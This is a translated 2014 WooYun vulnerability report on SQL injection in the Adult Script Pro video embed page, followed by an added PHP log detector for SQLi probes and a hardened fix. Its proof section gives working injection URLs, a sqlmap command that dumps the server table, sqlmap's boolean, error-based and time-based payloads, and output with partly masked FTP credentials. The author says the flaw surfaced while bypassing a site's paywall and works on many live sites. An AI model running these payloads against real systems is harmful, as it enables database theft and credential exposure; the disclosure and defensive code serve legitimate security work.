Vulnerability summary (24 followers)

Defect ID: wooyun-2014-065982

Title: Generic SQL injection vulnerability in a foreign adult website system

Vendor: Adult Script

Author: M0nster

Submitted: 2014-06-23 22:35

Fixed: 2014-06-28 22:18

Published: 2014-06-28 22:18

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-23: Details sent to the vendor, awaiting the vendor's response
2014-06-28: Vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

Every version tested has the SQL injection vulnerability, but the site software has to be purchased, so the exact version number is unknown. Reading the `server` table from the database yields the FTP address together with the username and password.

Detailed description:

It started because a certain gentlemen's site in China requires points to watch the instructional videos, so I went looking for the video player page, which gets around the points restriction. Later I tried 1=2 and it threw an error, and sqlmap dumped the database without any trouble. Then, when I logged in from my phone, I noticed the page title was different from the desktop one: it showed "Mobile Adult Script Pro", which is obviously an off-the-shelf product. A quick Google search led to the official site, and the vulnerability can be reproduced on the demo it provides.

http://www.adultscriptpro.com/demo.html


Googling the title turns up quite a few sites running this software; some need the path adjusted, but basically all of them work.

Proof of vulnerability:

http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1


[Screenshot: QQ截图20140623215155.png]


http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2


[Screenshot: QQ截图20140623215214.png]


python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2806 AND 6581=6581
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2806 AND SLEEP(5)
---
web application technology: PHP 5.4.26
back-end DBMS: MySQL 5.0
Database: ***
Table: server
[1 entry]
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| server_id | total_videos | url | status | ftp_port | ftp_root | ftp_host | last_used | server_name | rtmp_stream | lighttpd_url | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| 2 | 2974 | <blank> | 1 | 21 | / | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | *** | P4ss#w0rD | zx*****121 | /stream/ | apache | rtmp | 0 |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
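As an added example that is not part of the report: a small PHP script that flags access-log requests carrying the probe shapes visible in the sqlmap output above (a tautology and a contradiction against the same parameter, a SLEEP() call, the FLOOR(RAND(0)*2) error-based construct, and INFORMATION_SCHEMA lookups). The log lines in SAMPLE_LOG are constructed for the demo and use documentation IP ranges; the log format is the common combined format.

```php
<?php
// Added example, not part of the original report: classify web-server access
// log entries that carry the probe shapes seen in the sqlmap output above.
// The log lines in SAMPLE_LOG are constructed for this demo.

declare(strict_types=1);

const PROBE_PATTERNS = [
    'boolean_tautology'     => '/\b(?:and|or)\s+(\d+)\s*=\s*\1\b/',          // and 1=1, AND 6581=6581
    'boolean_contradiction' => '/\b(?:and|or)\s+(\d+)\s*=\s*(?!\1\b)\d+\b/', // and 1=2
    'time_based'            => '/\b(?:sleep|benchmark)\s*\(/',               // AND SLEEP(5)
    'error_based_rand'      => '/floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)/',
    'schema_enumeration'    => '/information_schema\./',
];

// Combined log format: client, ..., "METHOD path HTTP/x", status, bytes, referer, user agent.
const LOG_LINE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3}) \S+ "[^"]*" "([^"]*)"/';

function classifyRequest(string $line): ?array
{
    if (!preg_match(LOG_LINE, $line, $m)) {
        return null; // not a request line we understand
    }
    [, $client, $when, $path, $status, $agent] = $m;
    // Decode once so "1%3D1" and "1=1" are judged the same way; lower-case for matching.
    $decoded = strtolower(urldecode($path));
    $hits = [];
    foreach (PROBE_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    if (stripos($agent, 'sqlmap') !== false) {
        $hits[] = 'scanner_user_agent';
    }
    return ['client' => $client, 'time' => $when, 'path' => $path, 'status' => (int) $status, 'hits' => $hits];
}

// Count indicator types per client so a tautology/contradiction pair from one
// source stands out as differential (boolean-based blind) testing.
function summarize(array $lines): array
{
    $perClient = [];
    foreach ($lines as $line) {
        $r = classifyRequest($line);
        if ($r === null || $r['hits'] === []) {
            continue;
        }
        foreach ($r['hits'] as $h) {
            $perClient[$r['client']][$h] = ($perClient[$r['client']][$h] ?? 0) + 1;
        }
    }
    return $perClient;
}

const SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2014:21:51:02 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806 HTTP/1.1" 200 4130 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2014:21:51:55 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806%20and%201%3D1 HTTP/1.1" 200 4130 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2014:21:52:14 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806%20and%201%3D2 HTTP/1.1" 200 1022 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2014:21:58:40 +0800] "GET /modules/video/player/nuevo/embed.php?id=2806%20AND%20SLEEP%285%29 HTTP/1.1" 200 1022 "-" "sqlmap/1.0-dev"',
    '198.51.100.9 - - [23/Jun/2014:22:01:03 +0800] "GET /modules/video/player/nuevo/embed.php?id=2807 HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
];

foreach (summarize(SAMPLE_LOG) as $client => $counts) {
    printf("%s: %s\n", $client, json_encode($counts));
}
// Only 203.0.113.7 is reported: one tautology, one contradiction, one time-based
// probe and one scanner user agent. The benign request from 198.51.100.9 has
// no hits and is dropped from the summary.
```

The response-size column is worth keeping in a real rule: in the constructed lines the `and 1=2` request returns a much smaller body than `and 1=1`, which is exactly the differential the report's two screenshots show, so a tautology and a contradiction from one client with differing sizes is a stronger signal than either pattern alone.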


Fix recommendation:
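As an added example for this fix section, written for this page and not taken from Adult Script Pro, whose source is not shown here: the report's observations (that `id=2806 and 1=2` changes the response and that MySQL errors surface in the page) point at the raw `id` value being concatenated into the query and database errors being echoed to the client. The block shows that pattern beside a hardened handler that validates `id` as an integer, binds it in a server-side prepared statement and returns only generic errors. The file name, the `video` table, its column names, the DSN and the credentials are assumptions.

```php
<?php
// Added example (not Adult Script Pro's code): hardened handling of the `id`
// parameter of a video embed endpoint. Table, column and DSN are assumed.

declare(strict_types=1);

// Pattern the report describes: the raw query-string value is spliced into
// SQL, so "2806 and 1=2" rewrites the WHERE clause and a verbose MySQL error
// is returned to the client. Kept only for comparison; never use it.
function vulnerableLookup(PDO $db, string $rawId): ?array
{
    $row = $db->query('SELECT video_id, file_name FROM video WHERE video_id = ' . $rawId)
              ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form, step 1: validate the type before the value touches the
// database. Whole numbers only; no whitespace, no trailing " and 1=1".
function parseVideoId(string $rawId): ?int
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $rawId)) {
        return null;
    }
    return (int) $rawId;
}

// Step 2: bind the validated integer in a real (non-emulated) prepared
// statement, so the value is sent separately from the SQL text.
function safeLookup(PDO $db, string $rawId): ?array
{
    $id = parseVideoId($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT video_id, file_name FROM video WHERE video_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function connect(): PDO
{
    $dsn = 'mysql:host=127.0.0.1;dbname=adultscript;charset=utf8mb4'; // placeholder DSN
    return new PDO($dsn, 'app_user', getenv('DB_PASSWORD') ?: '', [   // placeholder credentials
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // throw, never print SQL errors
        PDO::ATTR_EMULATE_PREPARES   => false,                  // server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// Request handler
$rawId = (string) ($_GET['id'] ?? '');
if (parseVideoId($rawId) === null) {
    // A non-numeric id is either a probe or a bug; log it for the SOC and stop.
    error_log(sprintf('embed.php rejected id=%s from %s', $rawId, $_SERVER['REMOTE_ADDR'] ?? '-'));
    http_response_code(400);
    exit('Bad request');
}

try {
    $video = safeLookup(connect(), $rawId);
} catch (PDOException $e) {
    // Generic response only: the error-based technique in the report relies on
    // the MySQL message being echoed back to the client.
    error_log('embed.php database error: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}

if ($video === null) {
    http_response_code(404);
    exit('Not found');
}
header('Content-Type: text/html; charset=utf-8');
echo '<video src="', htmlspecialchars($video['file_name'], ENT_QUOTES, 'UTF-8'), '" controls></video>';
```

With this handler in place the two proof requests above both fail validation with a 400 before any query runs, so the `1=1` / `1=2` responses no longer differ, and a rejected value is recorded for later review. Rotating the FTP credentials stored in the `server` table is a separate, necessary step once a dump like the one in the proof has occurred, since the fix does not revoke what was already read.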

Copyright notice: please credit the source when reposting: M0nster@WooYun


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored the report

Ignored on: 2014-06-28 22:18

Vendor reply:

No contact channel with the software vendor has been established yet.

Latest status:

None